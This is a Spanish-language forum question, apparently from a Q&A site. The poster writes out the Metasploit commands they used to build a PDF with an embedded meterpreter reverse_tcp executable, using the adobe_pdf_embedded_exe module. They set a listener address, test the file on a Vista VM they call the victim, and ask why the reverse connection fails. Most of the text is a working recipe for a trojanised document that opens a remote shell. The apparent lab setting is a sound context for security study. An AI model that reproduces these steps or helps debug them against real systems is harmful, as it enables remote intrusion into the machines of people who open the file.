Estos son los pasos que realicé para generar un PDF incrustado con exe.
Máquina de ataque (Windows 7):
msf > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.102
msf payload(reverse_tcp) > generate -f C:\Users\User\Desktop\file.exe
msf payload(reverse_tcp) > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set EXENAME C:\Users\User\Desktop\file.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME file.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME C:\Users\User\Downloads\infile.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
Configuro un controlador y comienzo a escuchar la conexión inversa.
Máquina víctima (Windows Vista Ultimate en VM):
Puedo descargar el archivo pdf malicioso. Aparece el mensaje de inicio, pero tan pronto como se inicia la ejecución de la carga útil (se activa una consola en Vista), aparece un error en la máquina víctima que dice:
Windows no puede encontrar 'C: UsersUserDownloadsinfile.pdf'. Asegúrese escribió el nombre correctamente y vuelva a intentarlo.
La consola sale sin crear ninguna conexión inversa.
Pregunta :
¿Hay algún paso que me esté faltando o es el problema con las barras diagonales en la ruta del archivo que ingresé en el marco de metasploit?